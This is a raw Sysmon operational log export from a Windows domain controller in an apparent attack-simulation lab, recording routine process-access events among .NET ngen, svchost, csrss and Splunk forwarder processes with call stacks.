13:25:20.414{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4640-6000-9A03-000000009A01}3540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007825Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.242{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4640-6000-9903-000000009A01}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007824Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.226{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007823Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.226{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007822Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.226{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007821Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.226{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007820Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.226{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007819Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.226{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007818Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.226{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007817Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.226{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007816Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.226{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007815Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.226{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4640-6000-9903-000000009A01}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007814Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.226{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4640-6000-9903-000000009A01}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007813Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.227{08A6967A-4640-6000-9903-000000009A01}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007812Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4640-6000-9803-000000009A01}3280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007811Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.023{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4640-6000-9803-000000009A01}3280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007810Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:20.023{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4640-6000-9803-000000009A01}3280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007847Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:21.586{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4641-6000-A003-000000009A01}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007846Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:21.570{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4641-6000-A003-000000009A01}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007845Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:21.570{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4641-6000-A003-000000009A01}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007844Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:21.289{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4641-6000-9F03-000000009A01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007843Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:21.273{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4641-6000-9F03-000000009A01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007842Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:21.273{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4641-6000-9F03-000000009A01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007841Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:21.164{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4641-6000-9E03-000000009A01}4200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007840Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:21.148{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4641-6000-9E03-000000009A01}4200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007839Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 